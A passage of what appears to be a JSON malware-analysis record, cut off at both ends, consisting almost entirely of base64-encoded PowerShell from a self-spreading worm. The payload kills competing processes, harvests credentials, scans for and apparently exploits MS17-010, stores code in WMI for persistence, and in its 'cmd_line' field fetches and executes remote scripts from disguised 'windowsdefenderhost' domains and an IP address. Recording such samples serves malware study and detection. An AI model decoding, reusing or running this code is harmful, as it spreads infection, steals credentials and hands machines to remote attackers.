QgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==" + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbw